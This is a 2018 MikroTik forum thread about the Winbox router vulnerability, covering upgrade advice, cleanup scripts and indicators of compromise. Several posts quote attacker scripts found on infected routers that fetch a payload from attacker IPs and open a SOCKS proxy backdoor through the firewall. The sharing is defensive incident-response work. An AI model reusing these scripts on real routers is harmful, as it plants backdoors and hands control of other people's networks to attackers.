Community discussions

 
User avatar
BartoszP
Forum Guru
Forum Guru
Posts: 1613
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 9:20 am

43north ... you are using our forum ... you are posting ... why have you not upgraded your router earlier even you have had (I suppose) knowledge of the problem?
Real admins use real keyboards.
 
User avatar
43north
Member Candidate
Member Candidate
Posts: 192
Joined: Fri Nov 14, 2014 7:06 am

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 9:42 am

43north ... you are using our forum ... you are posting ... why have you not upgraded your router earlier even you have had (I suppose) knowledge of the problem?
Honestly I had never read the announcements section of the forum, I do now...... and will from here on out. My ignorance cost me, I know. Never again.

I appreciate any feedback anyone reference my post.
 
User avatar
BartoszP
Forum Guru
Forum Guru
Posts: 1613
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 9:59 am

Honestly I had never read the announcements section of the forum, I do now......
43north ... please do not take it personally :-) but this is the quotation of the month ... maybe even of the year.
Real admins use real keyboards.
 
User avatar
43north
Member Candidate
Member Candidate
Posts: 192
Joined: Fri Nov 14, 2014 7:06 am

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 10:09 am

Honestly I had never read the announcements section of the forum, I do now......
43north ... please do not take it personally :-) but this is quotation of the month ... maybe even of the year.
I don't take it personal at all. It is my fault for not being more in tune. I own it 100%. Super frustrating. I appreciate the Mikrotik staff and what they do for us.

After reading some other posts I believe the steps that I took as I posted in this thread have mitigated any issues from the incident.
 
msatter
Forum Veteran
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 10:28 am

43north ... you are using our forum ... you are posting ... why have you not upgraded your router earlier even you have had (I suppose) knowledge of the problem?
Honestly I had never read the announcements section of the forum, I do now...... and will from here on out. My ignorance cost me, I know. Never again.

I appreciate any feedback anyone reference my post.

169,999 Routers to go. So yours was not the only router that was taken over, that easily.

I keep an eye on the active topics that shows all postings that are recent. The trouble is that important postings like vulnerability posting drop as fast of the rest.
They are swiftly out of sight and you will miss them if you don't check in, several times a day.

Off quote but on topic, would this vulnerability had the highest CVE rating of 10?
RB760iGS (hEX S) with the SFP being cooled.
Running:
RouterOS 6.44Beta17 / Winbox 3.18 / MikroTik APP 0.69
Cooling a SFP module: viewtopic.php?f=3&t=132258&p=671105#p671105
 
User avatar
BartoszP
Forum Guru
Forum Guru
Posts: 1613
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 11:05 am

You do not have the required permissions to view the files attached to this post.
Real admins use real keyboards.
 
kobuki
Member Candidate
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 1:09 pm

  • ...
  • Create Security mailing list (the Blog you created is a nice step forward, but this is useful for "post event summary" and maybe not exactly for urgent security advisories).
    ...
I think this one would be very useful. I for one am subscribed to multiple ones already, and do pay attention to what's announced there since they always concisely describe the issues and give the CVE number(s) where one can see the in-depth details. MT issues regular product and update emails, this is at least as important if not more. It's not enough to list simple update bullets like usual, the email sent out on the 2nd was by far more effective because of its detailed contents and warnings issued.
 
volkeu
just joined
Posts: 1
Joined: Sun Aug 05, 2018 11:27 am

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 1:10 pm

I made this to look for the common stuff. (Copy and paste into terminal.)
...
Open you log and look at the results. If you have a result with "!" you might have a problem.
That's not really usable, is it? Besides, you still need to fix it, and upgrade afterwards.
Methinks, better to check and fix at the same time:
# Firewall auto-fix - dangerous if you had disabled drop rules before infection (can't imagine why, though)
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Firewall drop rules were disabled"; /ip firewall filter enable [find action=drop]}
:if ([:len [/ip firewall filter find chain=input action=accept dst-port="8291"]] > 0) do={:put "Winbox had default firewall accept rule";/ip firewall filter remove [find chain=input action=accept dst-port="8291"]}
# Use this if you need to check firewall rules manually
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Disabled firewall drop rules:"; /ip firewall filter print where  action=drop disabled}
# Winbox
:if ([/ip service get winbox disabled] != true) do={:put "Winbox was enabled"; /ip service disable winbox}
# Socks
:if ([/ip socks get port] != 1080) do={:put "Socks Port was not 1080"; /ip socks set port=1080}
:if ([/ip socks get enabled] != false) do={:put "Socks was enabled"; /ip socks set enabled=no}
:if ([:len [/ip socks access find src-address~"95.154.216.128"]] > 0) do={:put "ip socks access had rule for 95.154.216.128"; /ip socks access remove [find src-address~"95.154.216.128"]}
# Script and scheduler
:if ([:len [/system script find source~"ikrotik.php"]] > 0) do={:put "Script containing \"ikrotik.php\" found"; :foreach s in=[/system script find source~"ikrotik.php"] do={/system scheduler remove [find on-event~[/system script get $s name]]}; /system script remove [find source~"ikrotik.php"]}
# File mikrotik.php
:if ([:len [/file find name="mikrotik.php"]] + [:len [/file find name="Mikrotik.php"]] > 0) do={ :put "File [Mm]ikrotik.php was found"; /file remove [find name="mikrotik.php"]; /file remove [find name="Mikrotik.php"];}
# User "service"
:if ([:len [/user find name="service"]] > 0) do={:put "User \"service\" existed"; /user remove [find name="service"]}
I even made a bash script, since I needed to fix several dozen routers.
https://pastebin.com/GAtA2mZa
 
msatter
Forum Veteran
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 1:22 pm

Course I know where announcements a located, I am not stupid.

I am calling for doing that bit extra to inform all and keep an important notice im the picture.Creating the notice in announcements hope al is going being right from there is not working as is proven now.

Mikrotik has room improve also with the blog and if we keep fighting eachother like we are doing now, instead of thinking how to improve the whole Mikrotik eco system.
It may lead to Mikotik thinking we have still support how we are doing, have all done in the past and so keeps sitting on the sideline.

If that happens, and it looks now like that, we will have the same discussion again all over in time.
RB760iGS (hEX S) with the SFP being cooled.
Running:
RouterOS 6.44Beta17 / Winbox 3.18 / MikroTik APP 0.69
Cooling a SFP module: viewtopic.php?f=3&t=132258&p=671105#p671105
 
User avatar
CZFan
Forum Veteran
Forum Veteran
Posts: 999
Joined: Sun Oct 09, 2016 8:25 pm
Location: South Africa
Contact:

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 2:26 pm

Atleast send a mail to the Mikrotik certified members
MTCNA, MTCTCE, MTCRE & MTCINE
 
User avatar
BartoszP
Forum Guru
Forum Guru
Posts: 1613
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 2:34 pm

Mikrotik has room improve also with the blog...
Rhetorical question: Why people needs blogs, tweets or Facebook messages to feel beeing informed well?
Real admins use real keyboards.
 
excession
just joined
Posts: 17
Joined: Mon May 11, 2015 8:16 pm

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 3:04 pm

Thats it! THX!

In scripts are
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks
 
msatter
Forum Veteran
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 3:37 pm

Mikrotik has room improve also with the blog...
Rhetorical question: Why people needs blogs, tweets or Facebook messages to feel beeing informed well?
Because Twitter and Facebook are not wideley accepted ways to communicate. Facebook is evil and Twitter 'rate limits' me so of the visits I make only 10% are successful views. This is not normal.

For me those two way of communicating don't fly.

The blog is there to have a central, always accessible information source. It is side to side with the forum, in which can be interacted.
The blog is a one way directional communication platform and so the information has to be complete and not redirect for further information to other sites. It has to be a single source.
RB760iGS (hEX S) with the SFP being cooled.
Running:
RouterOS 6.44Beta17 / Winbox 3.18 / MikroTik APP 0.69
Cooling a SFP module: viewtopic.php?f=3&t=132258&p=671105#p671105
 
gotsprings
Long time Member
Long time Member
Posts: 571
Joined: Mon May 14, 2012 9:30 pm

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 3:57 pm

I made this to look for the common stuff. (Copy and paste into terminal.)
...
Open you log and look at the results. If you have a result with "!" you might have a problem.
That's not really usable, is it? Besides, you still need to fix it, and upgrade afterwards.
Methinks, better to check and fix at the same time:
# Firewall auto-fix - dangerous if you had disabled drop rules before infection (can't imagine why, though)
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Firewall drop rules were disabled"; /ip firewall filter enable [find action=drop]}
:if ([:len [/ip firewall filter find chain=input action=accept dst-port="8291"]] > 0) do={:put "Winbox had default firewall accept rule";/ip firewall filter remove [find chain=input action=accept dst-port="8291"]}
# Use this if you need to check firewall rules manually
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Disabled firewall drop rules:"; /ip firewall filter print where  action=drop disabled}
# Winbox
:if ([/ip service get winbox disabled] != true) do={:put "Winbox was enabled"; /ip service disable winbox}
# Socks
:if ([/ip socks get port] != 1080) do={:put "Socks Port was not 1080"; /ip socks set port=1080}
:if ([/ip socks get enabled] != false) do={:put "Socks was enabled"; /ip socks set enabled=no}
:if ([:len [/ip socks access find src-address~"95.154.216.128"]] > 0) do={:put "ip socks access had rule for 95.154.216.128"; /ip socks access remove [find src-address~"95.154.216.128"]}
# Script and scheduler
:if ([:len [/system script find source~"ikrotik.php"]] > 0) do={:put "Script containing \"ikrotik.php\" found"; :foreach s in=[/system script find source~"ikrotik.php"] do={/system scheduler remove [find on-event~[/system script get $s name]]}; /system script remove [find source~"ikrotik.php"]}
# File mikrotik.php
:if ([:len [/file find name="mikrotik.php"]] + [:len [/file find name="Mikrotik.php"]] > 0) do={ :put "File [Mm]ikrotik.php was found"; /file remove [find name="mikrotik.php"]; /file remove [find name="Mikrotik.php"];}
# User "service"
:if ([:len [/user find name="service"]] > 0) do={:put "User \"service\" existed"; /user remove [find name="service"]}
I even made a bash script, since I needed to fix several dozen routers.
https://pastebin.com/GAtA2mZa
What I put up was to help you determine if you had "been hit". Since I don't know how everyone else in the world set up their routers... I WOULD NOT SCRIPT IN CHANGES. It was merely a "Use this to see if you have some of the common signs of this attack."

What I built for routers I configured, removed and made changes based me knowing what it was going to do to a system.

For instance... I have firewall drop rules that are enabled and disabled based on other input.
Example: If the main ISP is down and system is on cellular. Enable the drop rule on the forwarding of guest traffic.
Now one might argue turning off the accept rule from the guest network would have the same effect...
But placing this at the top of the forwarding chain and setting it to drop ANYTHING from source GuestSubnet will stop the traffic sooner. Especially if the detection script also flushed the connections.
That drop rule is also activated by scheduler as well.

So its pretty common for one of my routers to have several drop rules disabled under normal operations.

Also... shutting off winbox... that might be bad too.

How about adding a jump chain to blacklist an IP after several unsuccessful log ins... Seems like a great idea too. But not knowing how someone else wrote their firewall...
Or
How about requiring port knocking to people to reach the router at all..
Or
Limiting IP scopes where admin access is available.

Those are all ways to go... but what I put up there was only meant to "look for signs". Its still up to the user to decide what to do about it.

And in your "script scheduler"
There are a few other additions I found. The most common entries I found across A LOT OF ROUTERS were
Schedules named "a" and "schedule3_".
Scripts named "ip" and "script3_" saw one instance of something like "script1". Of those scripts.... some did not contain mikrotik.php at all.
So keep that in mind when "looking for signs"
"It ain't what you don't know that gets you into trouble. It's what you know for sure that just ain't so."
Mark Twain
 
User avatar
43north
Member Candidate
Member Candidate
Posts: 192
Joined: Fri Nov 14, 2014 7:06 am

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 8:37 pm

Thats it! THX!

In scripts are
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks
I grabbed the PHP file before fixing my router. I opened it with notepad and it was completely blank......
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23509
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 8:30 am

It's disappointing that both the httpd vulnerability
We did fix and send on day one.
No answer to your question? How to write posts
 
msatter
Forum Veteran
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 9:43 am

It's disappointing that both the httpd vulnerability
We did fix and send on day one.
This is referring to this post: viewtopic.php?f=21&t=137572#p678156
RB760iGS (hEX S) with the SFP being cooled.
Running:
RouterOS 6.44Beta17 / Winbox 3.18 / MikroTik APP 0.69
Cooling a SFP module: viewtopic.php?f=3&t=132258&p=671105#p671105
 
User avatar
rushlife
Frequent Visitor
Frequent Visitor
Posts: 74
Joined: Thu Nov 05, 2015 12:30 pm
Location: czech republic

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 10:35 am

According to changelog it is fixed
What's new in 6.40.8 (2018-Apr-23 11:34):

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
So why would they post this again if it was fixed in April?
do you can read ?
 
msatter
Forum Veteran
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 11:14 am

According to changelog it is fixed
What's new in 6.40.8 (2018-Apr-23 11:34):

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
So why would they post this again if it was fixed in April?
do you can read ?

THEN, IS THIS CLEAR INFORMATION? All versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) are vulnerable. Is your device affected? and ...the same vulnerability in the RouterOS Winbox service, that was patched in RouterOS v6.42.1 in April 23, 2018.

To me this is also obsolete and confusing information, one had to know what the status is on the second of August and the rest is history. Give information about the current required version you have to be not vulnerable and that has to be on top and repeated in the text. This required version can be even higher than the one on the 2018/04/23.

The bugfix is on 6.40.8, also vulnerable if you look at the text above. However the release date is 2018/04/23. This is confusing and you if you don't go and read the blog you woul'd not know what the status is of 6.40.8.

All those postings about 6.40.8 could have been not posted if only the TS had given complete and clear information.
RB760iGS (hEX S) with the SFP being cooled.
Running:
RouterOS 6.44Beta17 / Winbox 3.18 / MikroTik APP 0.69
Cooling a SFP module: viewtopic.php?f=3&t=132258&p=671105#p671105
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23509
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 11:15 am

Well, the linked blog does include this information
Versions that include a fix: 6.40.8 [bugfix] or 6.42.1 [current] released on 25-mar-2018
We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html
No answer to your question? How to write posts
 
dada
Member Candidate
Member Candidate
Posts: 243
Joined: Tue Feb 21, 2006 1:44 pm

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 11:42 am

We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html
thanks, it is much more clear now. Except that the 6.28 version is vulnerable too. I am able to read usernames/passwords from boards with this version using winbox vulnerability exploit code...
Last edited by dada on Mon Aug 06, 2018 2:55 pm, edited 1 time in total.
 
DummyPLUG
newbie
Posts: 43
Joined: Wed Jan 03, 2018 10:17 am

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 12:43 pm

As other said make a CVE for each vulnerability, it is easier to know if we are taking about the same thing.
for example right now we know which winbox vulnerability we are talking about just because there is only one, if there is another one in future how can we know which one we are talking about? Winbox vulnerability 2017 &20xx?
 
kobuki
Member Candidate
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 12:46 pm

We have added more details, so that it is more clear:
https://blog.mikrotik.com/security/winb ... ility.html
It would be really useful to bump that post with today's date and tag with (UPDATED) or something.
 
msatter
Forum Veteran
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 1:30 pm

Well, the linked blog does include this information
Versions that include a fix: 6.40.8 [bugfix] or 6.42.1 [current] released on 25-mar-2018
We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html
I did write that the blog did contain that information about 6.40.8 and it is much clearer and that pleases me.

Don't distribute the information over different platform without having all having the same information.

I an not that harsh because I like to be so. I want that Mikrotik will give their customers beter product experience and security.
RB760iGS (hEX S) with the SFP being cooled.
Running:
RouterOS 6.44Beta17 / Winbox 3.18 / MikroTik APP 0.69
Cooling a SFP module: viewtopic.php?f=3&t=132258&p=671105#p671105
 
msatter
Forum Veteran
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 3:56 pm

We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html
thanks, it is much more clear now. Except that the 6.28 version is vulnerable too. I am able to read usernames/passwords from boards with this version using winbox vulnerability exploit code...
Please e-mail Mikrotik support with your findings on support@mikrotik.com so they can have a look into that. It will not have any impact on the advise to which minimal required RouterOS version have to be used.
RB760iGS (hEX S) with the SFP being cooled.
Running:
RouterOS 6.44Beta17 / Winbox 3.18 / MikroTik APP 0.69
Cooling a SFP module: viewtopic.php?f=3&t=132258&p=671105#p671105
 
msatter
Forum Veteran
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 3:57 pm

It looks that an CVE has been created and I don't know enough about if it is done by the one who discovered this vulnerability of by Mikrotik self. The CVE number is: CVE-2018-14847
RB760iGS (hEX S) with the SFP being cooled.
Running:
RouterOS 6.44Beta17 / Winbox 3.18 / MikroTik APP 0.69
Cooling a SFP module: viewtopic.php?f=3&t=132258&p=671105#p671105
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23509
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 4:09 pm

CVE numbers don't have owners or publishers. Yes, you can use that CVE number to refer to this vulnerability. We will try to make numbers for any next vulnerability, if such would be discovered.
No answer to your question? How to write posts
 
User avatar
awacenter
Member Candidate
Member Candidate
Posts: 192
Joined: Thu Dec 09, 2004 12:58 pm
Location: Castellón
Contact:

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 5:52 pm

We detect these issues and we try to update and upgrade all mikrotik devices.
Besid of this, we block all source IP via BGP when we can inform to our ISP.
 
User avatar
honzam
Forum Guru
Forum Guru
Posts: 2129
Joined: Wed Feb 27, 2008 10:27 pm
Location: Czech Republic

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 8:17 pm

We will try to make numbers for any next vulnerability, if such would be discovered.
I hope no :)
LAN, FTTx, Wireless. ISP operator
 
User avatar
BrianHiggins
Long time Member
Long time Member
Posts: 593
Joined: Mon Jan 16, 2006 6:07 am
Location: Norwalk, CT
Contact:

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 9:56 pm

Is there anymore detailed information than the old blog post? I've seen numerous routers running 6.40.8 bugfix get compromised in the last few days. Winbox was externally accessible. On Friday I updated a couple older routers that had not yet been compromised that weren't on 6.40.8 to 6.40.8, only too find those routers compromised today. I've now updated nearly everything to 6.42.6 current and restricted 8291 to only the range of external IPs that need access, and so far I haven't seen any re-compromised routers.


Changes I've found in compromised routers

/system logging action
memory-lines set to 1

/ip socks
enabled, port set, connection timeout changed, max connections increased

/ip firewall filter
input chain tcp allow rule to match socks port
drop rules disabled on all chains

/system scripts
one or more scripts added
first script seen calls tool fetch to download files
second script seen makes all changes seen above except memory-lines=1, unclear when / how that's set

/system scheduler
one or more schedules added to call scripts mentioned

/user
add service user account

Other users I've spoken with report finding an empty mikrotik.php text file in /file, though I didn't encounter that myself.

One interesting thing I noted was that the only routers I found compromised were also routers running additional services or with NAT rules exposing services. I'm guessing they didn't scan for 8291, they instead scanned for something else to build the list of IPs to target. every single router that was otherwise locked down without any services beside 8291 exposed regardless of build number remained uncompromised. Might just be a coincidence, but was worth noting.

EDIT, added sample of scripts found on one of the routers.
/system script
add name=script4_ owner=service policy=ftp,reboot,read,write,policy,test,password,sensitive source=\
    "/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no"
add name="port 39593" owner=admin policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/ip firewall filter remove [/ip firewall filter find where comment ~ \"port [0-9]*\"];/ip socks set enabled=yes port=39593 max-connections=255 connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=39593 action=accept comment=\"port 39593\";/ip firewall filter move [/ip firewall filter find comment=\"port 39593\"] 1;"
-Brian

http://www.aditumims.com
Complete web based ISP in-a-box solution, designed specifically for Multi-Tenant properties, works great for WISPs too.
 
tippenring
Member Candidate
Member Candidate
Posts: 150
Joined: Thu Oct 02, 2014 8:54 pm
Location: St Louis MO
Contact:

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 10:48 pm

Is there anymore detailed information than the old blog post? I've seen numerous routers running 6.40.8 bugfix get compromised in the last few days. Winbox was externally accessible. On Friday I updated a couple older routers that had not yet been compromised that weren't on 6.40.8 to 6.40.8, only too find those routers compromised today.
The conclusion that your routers were not compromised prior to the upgrade to 6.40.8 is invalid. The correct conclusion is that there was no *apparent* indication of compromise. I'll bet you didn't change the admin passwords when you upgraded to 6.40.8. Is that correct? Assuming no password change, someone connected to your router some time ago and downloaded the admin credentials. They only recently logged in and changed your configuration.
I've now updated nearly everything to 6.42.6 current and restricted 8291 to only the range of external IPs that need access, and so far I haven't seen any re-compromised routers.
Restricting admin access to only known good source IPs is a good practice. You could also look at port knocking if you need more flexibility.
 
gotsprings
Long time Member
Long time Member
Posts: 571
Joined: Mon May 14, 2012 9:30 pm

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 12:27 am

Is there anymore detailed information than the old blog post? I've seen numerous routers running 6.40.8 bugfix get compromised in the last few days. Winbox was externally accessible. On Friday I updated a couple older routers that had not yet been compromised that weren't on 6.40.8 to 6.40.8, only too find those routers compromised today.
The conclusion that your routers were not compromised prior to the upgrade to 6.40.8 is invalid. The correct conclusion is that there was no *apparent* indication of compromise. I'll bet you didn't change the admin passwords when you upgraded to 6.40.8. Is that correct? Assuming no password change, someone connected to your router some time ago and downloaded the admin credentials. They only recently logged in and changed your configuration.
I've now updated nearly everything to 6.42.6 current and restricted 8291 to only the range of external IPs that need access, and so far I haven't seen any re-compromised routers.
Restricting admin access to only known good source IPs is a good practice. You could also look at port knocking if you need more flexibility.
I looked over the log of another installers router.

[admin@MikroTik] /log> print
jul/06 21:10:09 system,info verified routeros-arm-6.42.5.npk
jul/06 21:10:09 system,info installed routeros-arm-6.42.5

jul/16 12:00:50 system,info,account user admin logged in from 194.40.240.254 via winbox
jul/16 12:00:53 system,info,account user admin logged in from 194.40.240.254 via telnet
jul/16 12:00:54 system,info socks config changed by admin
jul/16 12:00:55 system,info filter rule added by admin
jul/16 12:00:55 system,info filter rule moved by admin
jul/16 12:00:56 system,info,account user admin logged out from 194.40.240.254 via winbox
jul/16 12:00:56 system,info,account user admin logged out from 194.40.240.254 via telnet

jul/24 21:58:07 system,info,account user admin logged in from 185.153.198.228 via winbox
jul/24 21:58:10 system,info,account user admin logged in from 185.153.198.228 via telnet
jul/24 21:58:11 system,info user service added by admin
jul/24 21:58:11 system,info filter rule removed by admin
jul/24 21:58:12 system,info socks config changed by admin
jul/24 21:58:13 system,info filter rule added by admin
jul/24 21:58:13 system,info filter rule moved by admin
jul/24 21:58:14 system,info,account user admin logged out from 185.153.198.228 via winbox
jul/24 21:58:14 system,info,account user admin logged out from 185.153.198.228 via telnet

When they updated they didn't change the password.
"It ain't what you don't know that gets you into trouble. It's what you know for sure that just ain't so."
Mark Twain
 
tippenring
Member Candidate
Member Candidate
Posts: 150
Joined: Thu Oct 02, 2014 8:54 pm
Location: St Louis MO
Contact:

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 1:12 am


When they updated they didn't change the password.
No, the attacker didn't change the password. If he did, that would give away that the router had been compromised. The attacker didn't want you to know he had the admin password for the router. So, you upgraded software, but did not change the password that the attacker obtained when you were running the vulnerable version.
 
gotsprings
Long time Member
Long time Member
Posts: 571
Joined: Mon May 14, 2012 9:30 pm

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 1:38 am

Tippenring.

I was agreeing with you. The logs were proof that 2 different attackers had the password from before the upgrade
"It ain't what you don't know that gets you into trouble. It's what you know for sure that just ain't so."
Mark Twain
 
aswin
just joined
Posts: 5
Joined: Tue Jul 11, 2017 6:26 pm

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 5:36 am

I have one remote router (CCR1009 v6.40.7) which infected with "sys" virus/spyware version 30RC9 on 2Aug. This spyware lock my "admin" account to readonly and create "sys account as full read/write policy and also lock the allowed address login from 127.0.0.1 only. The script also change the time of reformat-hold-button+reformat-hold-button-max in every second
I use the exploit which can get the "sys" password but I don't know how to login to router and reset them to factory configuration. Can I use the serial port to console login or need to reset nand gate chip?
https://ibb.co/gsfc0e
https://ibb.co/nHDKwK
https://ibb.co/d0RuVe
https://ibb.co/b44RbK
https://ibb.co/cww03z
 
tippenring
Member Candidate
Member Candidate
Posts: 150
Joined: Thu Oct 02, 2014 8:54 pm
Location: St Louis MO
Contact:

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 7:12 am

Tippenring.

I was agreeing with you. The logs were proof that 2 different attackers had the password from before the upgrade
I misunderstood your post. My apologies.
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23509
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 8:08 am

I have one remote router (CCR1009 v6.40.7) which infected with "sys" virus/spyware version 30RC9 on 2Aug. This spyware lock my "admin" account to readonly and create "sys account as full read/write policy and also lock the allowed address login from 127.0.0.1 only. The script also change the time of reformat-hold-button+reformat-hold-button-max in every second
I use the exploit which can get the "sys" password but I don't know how to login to router and reset them to factory configuration. Can I use the serial port to console login or need to reset nand gate chip?
https://ibb.co/gsfc0e
https://ibb.co/nHDKwK
https://ibb.co/d0RuVe
https://ibb.co/b44RbK
https://ibb.co/cww03z
1) Wait, so you have the "sys" password? What is it? I think it will be useful for others to find out too.
2) Just log in with Winbox username "sys" and the password that you found. What is the question?
No answer to your question? How to write posts
 
grusu
Frequent Visitor
Frequent Visitor
Posts: 80
Joined: Tue Aug 13, 2013 7:35 am
Location: Bucharest, Romania

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 8:22 am

As far as I can see in the first picture, the sys user can log only from IP 127.0.0.1 so you can only try from the serial port.
 
aswin
just joined
Posts: 5
Joined: Tue Jul 11, 2017 6:26 pm

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 9:26 am

I have one remote router (CCR1009 v6.40.7) which infected with "sys" virus/spyware version 30RC9 on 2Aug. This spyware lock my "admin" account to readonly and create "sys account as full read/write policy and also lock the allowed address login from 127.0.0.1 only. The script also change the time of reformat-hold-button+reformat-hold-button-max in every second
I use the exploit which can get the "sys" password but I don't know how to login to router and reset them to factory configuration. Can I use the serial port to console login or need to reset nand gate chip?
https://ibb.co/gsfc0e
https://ibb.co/nHDKwK
https://ibb.co/d0RuVe
https://ibb.co/b44RbK
https://ibb.co/cww03z
1) Wait, so you have the "sys" password? What is it? I think it will be useful for others to find out too.
2) Just log in with Winbox username "sys" and the password that you found. What is the question?
1. I have try to read this topic viewtopic.php?f=2&t=131166&p=646273&hil ... ys#p646273 but no success because of newer spyware version I just google from internet and there are exploits which can use the mikrotik vulnerability to get mikrotik password with easily (python + script + destination IP). So I just understand why this bug can spread too fast to many mikrotik router which not patch to safe baseline version. (including me 555)
https://ibb.co/jh2Siz

2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account.
And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router is still locate on other place)
 
User avatar
Jotne
Member
Member
Posts: 473
Joined: Sat Dec 24, 2016 11:17 am

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 9:29 am

The title of this thread is some misleading:
Winbox vulnerability: please upgrade
It looks like Winbox is the problem, not the RouterOS.
It does not help to upgrade the Winbox :)
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23509
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 9:42 am

The title of this thread is some misleading:
Winbox vulnerability: please upgrade
It looks like Winbox is the problem, not the RouterOS.
It does not help to upgrade the Winbox :)
This is why sometimes reading is important. Quote:
vulnerability in the RouterOS Winbox service, that was patched in RouterOS
Steps to be taken: Upgrade RouterOS to the latest release
It is really so hard to read more than the first 4 words?
No answer to your question? How to write posts
 
User avatar
Jotne
Member
Member
Posts: 473
Joined: Sat Dec 24, 2016 11:17 am

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 9:46 am

- Implement a good firewall according to the article here: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
When you setup a default NAT, it looks like that all service port are blocked from the outside.
Do I still need to specify for where Windbox should be allowed?
/ip service set winbox address=192.168.88.0/24
I only have two user on the net, me and my wife :)

